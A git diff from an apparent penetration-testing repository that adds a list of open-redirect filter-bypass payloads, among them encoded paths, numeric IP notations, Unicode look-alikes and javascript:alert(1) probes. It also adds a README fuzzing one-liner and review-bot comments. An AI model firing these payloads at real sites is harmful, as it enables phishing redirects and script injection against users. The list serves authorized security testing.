diff --git a/Open redirect/Open-Redirect-payloads.txt b/Open redirect/Open-Redirect-payloads.txt new file mode 100644 index 00000000..6b456f1a --- /dev/null +++ b/Open redirect/Open-Redirect-payloads.txt 
@@ -0,0 +1,235 @@ +//google.com/%2f.. +//www.whitelisteddomain.tld@google.com/%2f.. +///google.com/%2f.. +///www.whitelisteddomain.tld@google.com/%2f.. +////google.com/%2f.. +////www.whitelisteddomain.tld@google.com/%2f.. +https://google.com/%2f.. +https://www.whitelisteddomain.tld@google.com/%2f.. +/https://google.com/%2f.. +/https://www.whitelisteddomain.tld@google.com/%2f.. +//www.google.com/%2f%2e%2e +//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e +///www.google.com/%2f%2e%2e +///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e +////www.google.com/%2f%2e%2e +////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e +https://www.google.com/%2f%2e%2e +https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e +/https://www.google.com/%2f%2e%2e +/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e +//google.com/ +//www.whitelisteddomain.tld@google.com/ +///google.com/ +///www.whitelisteddomain.tld@google.com/ +////google.com/ +////www.whitelisteddomain.tld@google.com/ +https://google.com/ +https://www.whitelisteddomain.tld@google.com/ +/https://google.com/ +/https://www.whitelisteddomain.tld@google.com/ +//google.com// +//www.whitelisteddomain.tld@google.com// +///google.com// +///www.whitelisteddomain.tld@google.com// +////google.com// +////www.whitelisteddomain.tld@google.com// +https://google.com// +https://www.whitelisteddomain.tld@google.com// +//https://google.com// +//https://www.whitelisteddomain.tld@google.com// +//www.google.com/%2e%2e%2f +//www.whitelisteddomain.tld@www.google.com/%2e%2e%2f +///www.google.com/%2e%2e%2f +///www.whitelisteddomain.tld@www.google.com/%2e%2e%2f +////www.google.com/%2e%2e%2f +////www.whitelisteddomain.tld@www.google.com/%2e%2e%2f +https://www.google.com/%2e%2e%2f +https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f +//https://www.google.com/%2e%2e%2f +//https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f +///www.google.com/%2e%2e +///www.whitelisteddomain.tld@www.google.com/%2e%2e 
+////www.google.com/%2e%2e +////www.whitelisteddomain.tld@www.google.com/%2e%2e +https:///www.google.com/%2e%2e +https:///www.whitelisteddomain.tld@www.google.com/%2e%2e +//https:///www.google.com/%2e%2e +//www.whitelisteddomain.tld@https:///www.google.com/%2e%2e +/https://www.google.com/%2e%2e +/https://www.whitelisteddomain.tld@www.google.com/%2e%2e +///www.google.com/%2f%2e%2e +///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e +////www.google.com/%2f%2e%2e +////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e +https:///www.google.com/%2f%2e%2e +https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e +/https://www.google.com/%2f%2e%2e +/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e +/https:///www.google.com/%2f%2e%2e +/https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e +/%09/google.com +/%09/www.whitelisteddomain.tld@google.com +//%09/google.com +//%09/www.whitelisteddomain.tld@google.com +///%09/google.com +///%09/www.whitelisteddomain.tld@google.com +////%09/google.com +////%09/www.whitelisteddomain.tld@google.com +https://%09/google.com +https://%09/www.whitelisteddomain.tld@google.com +/%5cgoogle.com +/%5cwww.whitelisteddomain.tld@google.com +//%5cgoogle.com +//%5cwww.whitelisteddomain.tld@google.com +///%5cgoogle.com +///%5cwww.whitelisteddomain.tld@google.com +////%5cgoogle.com +////%5cwww.whitelisteddomain.tld@google.com +https://%5cgoogle.com +https://%5cwww.whitelisteddomain.tld@google.com +/https://%5cgoogle.com +/https://%5cwww.whitelisteddomain.tld@google.com +https://google.com +https://www.whitelisteddomain.tld@google.com +javascript:alert(1); +javascript:alert(1) +//javascript:alert(1); +/javascript:alert(1); +//javascript:alert(1) +/javascript:alert(1) +/%5cjavascript:alert(1); +/%5cjavascript:alert(1) +//%5cjavascript:alert(1); +//%5cjavascript:alert(1) +/%09/javascript:alert(1); +/%09/javascript:alert(1) +java%0d%0ascript%0d%0a:alert(0) +//google.com +https:google.com +//google%E3%80%82com +\/\/google.com/ 
+/\/google.com/ +//google%00.com +https://www.whitelisteddomain.tld/https://www.google.com/ +";alert(0);// +javascript://www.whitelisteddomain.tld?%a0alert%281%29 +http://0xd8.0x3a.0xd6.0xce +http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce +http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce +http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce +http://0xd83ad6ce +http://www.whitelisteddomain.tld@0xd83ad6ce +http://3H6k7lIAiqjfNeN@0xd83ad6ce +http://XY>.7d8T\205pZM@0xd83ad6ce +http://3627734734 +http://www.whitelisteddomain.tld@3627734734 +http://3H6k7lIAiqjfNeN@3627734734 +http://XY>.7d8T\205pZM@3627734734 +http://472.314.470.462 +http://www.whitelisteddomain.tld@472.314.470.462 +http://3H6k7lIAiqjfNeN@472.314.470.462 +http://XY>.7d8T\205pZM@472.314.470.462 +http://0330.072.0326.0316 +http://www.whitelisteddomain.tld@0330.072.0326.0316 +http://3H6k7lIAiqjfNeN@0330.072.0326.0316 +http://XY>.7d8T\205pZM@0330.072.0326.0316 +http://00330.00072.0000326.00000316 +http://www.whitelisteddomain.tld@00330.00072.0000326.00000316 +http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 +http://XY>.7d8T\205pZM@00330.00072.0000326.00000316 +http://[::216.58.214.206] +http://www.whitelisteddomain.tld@[::216.58.214.206] +http://3H6k7lIAiqjfNeN@[::216.58.214.206] +http://XY>.7d8T\205pZM@[::216.58.214.206] +http://[::ffff:216.58.214.206] +http://www.whitelisteddomain.tld@[::ffff:216.58.214.206] +http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] +http://XY>.7d8T\205pZM@[::ffff:216.58.214.206] +http://0xd8.072.54990 +http://www.whitelisteddomain.tld@0xd8.072.54990 +http://3H6k7lIAiqjfNeN@0xd8.072.54990 +http://XY>.7d8T\205pZM@0xd8.072.54990 +http://0xd8.3856078 +http://www.whitelisteddomain.tld@0xd8.3856078 +http://3H6k7lIAiqjfNeN@0xd8.3856078 +http://XY>.7d8T\205pZM@0xd8.3856078 +http://00330.3856078 +http://www.whitelisteddomain.tld@00330.3856078 +http://3H6k7lIAiqjfNeN@00330.3856078 +http://XY>.7d8T\205pZM@00330.3856078 +http://00330.0x3a.54990 +http://www.whitelisteddomain.tld@00330.0x3a.54990 
+http://3H6k7lIAiqjfNeN@00330.0x3a.54990 +http://XY>.7d8T\205pZM@00330.0x3a.54990 +http:0xd8.0x3a.0xd6.0xce +http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce +http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce +http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce +http:0xd83ad6ce +http:www.whitelisteddomain.tld@0xd83ad6ce +http:3H6k7lIAiqjfNeN@0xd83ad6ce +http:XY>.7d8T\205pZM@0xd83ad6ce +http:3627734734 +http:www.whitelisteddomain.tld@3627734734 +http:3H6k7lIAiqjfNeN@3627734734 +http:XY>.7d8T\205pZM@3627734734 +http:472.314.470.462 +http:www.whitelisteddomain.tld@472.314.470.462 +http:3H6k7lIAiqjfNeN@472.314.470.462 +http:XY>.7d8T\205pZM@472.314.470.462 +http:0330.072.0326.0316 +http:www.whitelisteddomain.tld@0330.072.0326.0316 +http:3H6k7lIAiqjfNeN@0330.072.0326.0316 +http:XY>.7d8T\205pZM@0330.072.0326.0316 +http:00330.00072.0000326.00000316 +http:www.whitelisteddomain.tld@00330.00072.0000326.00000316 +http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 +http:XY>.7d8T\205pZM@00330.00072.0000326.00000316 +http:[::216.58.214.206] +http:www.whitelisteddomain.tld@[::216.58.214.206] +http:3H6k7lIAiqjfNeN@[::216.58.214.206] +http:XY>.7d8T\205pZM@[::216.58.214.206] +http:[::ffff:216.58.214.206] +http:www.whitelisteddomain.tld@[::ffff:216.58.214.206] +http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] +http:XY>.7d8T\205pZM@[::ffff:216.58.214.206] +http:0xd8.072.54990 +http:www.whitelisteddomain.tld@0xd8.072.54990 +http:3H6k7lIAiqjfNeN@0xd8.072.54990 +http:XY>.7d8T\205pZM@0xd8.072.54990 +http:0xd8.3856078 +http:www.whitelisteddomain.tld@0xd8.3856078 +http:3H6k7lIAiqjfNeN@0xd8.3856078 +http:XY>.7d8T\205pZM@0xd8.3856078 +http:00330.3856078 +http:www.whitelisteddomain.tld@00330.3856078 +http:3H6k7lIAiqjfNeN@00330.3856078 +http:XY>.7d8T\205pZM@00330.3856078 +http:00330.0x3a.54990 +http:www.whitelisteddomain.tld@00330.0x3a.54990 +http:3H6k7lIAiqjfNeN@00330.0x3a.54990 +http:XY>.7d8T\205pZM@00330.0x3a.54990 +〱google.com +〵google.com +ゝgoogle.com +ーgoogle.com +ーgoogle.com +/〱google.com +/〵google.com 
+/ゝgoogle.com +/ーgoogle.com +/ーgoogle.com +%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d +http://%67%6f%6f%67%6c%65%2e%63%6f%6d +<>javascript:alert(1); +<>//google.com +//google.com\@www.whitelisteddomain.tld +https://:@google.com\@www.whitelisteddomain.tld +\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) +\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) +ja\nva\tscript\r:alert(1) +\j\av\a\s\cr\i\pt\:\a\l\ert\(1\) +\152\141\166\141\163\143\162\151\160\164\072alert(1) +http://google.com:80#@www.whitelisteddomain.tld/ +http://google.com:80?@www.whitelisteddomain.tld/ diff --git a/Open redirect/README.md b/Open redirect/README.md index e72b6c8d..9ce04887 100644 --- a/Open redirect/README.md +++ b/Open redirect/README.md 
@@ -1,7 +1,15 @@ # Open URL Redirection -Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. +Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. -## Exploits +## Fuzzing +Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case + +To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your test case URL. +``` +WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. 
'{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt +``` + +## Exploitation Using CRLF to bypass "javascript" blacklisted keyword ``` @@ -21,7 +29,7 @@ https:google.com Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //) ``` \/\/google.com/ -/\/google.com/ +/\/google.com/ ``` @@ -66,4 +74,5 @@ http://www.example.com/redirect.php?url=javascript:prompt(1) ## Thanks to * filedescriptor -* https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet \ No newline at end of file +* https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet +* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
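Review bot: the new `Open-Redirect-payloads.txt` hunk should carry a short header (or a README pointer) explaining its two placeholders, because only `www.whitelisteddomain.tld` is documented while the fixed destination `google.com` is not: a tester reading the file alone will not know that the numeric entries (`0xd8.0x3a.0xd6.0xce`, `3627734734`, `0330.072.0326.0316`, `[::ffff:216.58.214.206]`, and so on) are all notations of the single address `216.58.214.206`, nor that the `javascript:alert(1)` family tests for script execution on the redirect sink rather than for a redirect. The pair `+ーgoogle.com +ーgoogle.com` (and the `/`-prefixed pair below it) render identically here; if they are distinct code points a comment saying which is which would help, otherwise one is a duplicate. The `\205` in `XY>.7d8T\205pZM@…` reads as a literal backslash-octal sequence; if a raw 0x85 byte is intended, say so, since editors and payload loaders will normalize the two differently.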
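Review bot: in the `## Fuzzing` hunk of `README.md` the `sed` expression `s/www.whitelisteddomain.tld/…/` has no `g` flag and leaves the dots unescaped, so it replaces only the first occurrence per line and `.` matches any character; `s/www\.whitelisteddomain\.tld/…/g` is the intended form. The trailing `awk -F. '{print "https://"$0"."$NF}'` appends an entry of the form `https://www.test.com.com` (the domain with its own TLD repeated) without saying what that case exercises; one explanatory sentence is needed. The `-Unvalidated…`/`+Unvalidated…` pair shows no visible textual change, so it is presumably whitespace or line-ending churn; keep it out of a content commit or mention it in the commit message. Finally, "Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case" reads better as "Replace www.whitelisteddomain.tld in *Open-Redirect-payloads.txt* with the whitelisted domain of your test case".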
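Review bot: the `-/\/google.com/` / `+/\/google.com/` hunk under the "Using \/\/ to bypass //" section changes nothing visible, so it is whitespace or line-ending churn; either drop it from this commit or note the normalization in the commit message so reviewers do not search for a content change.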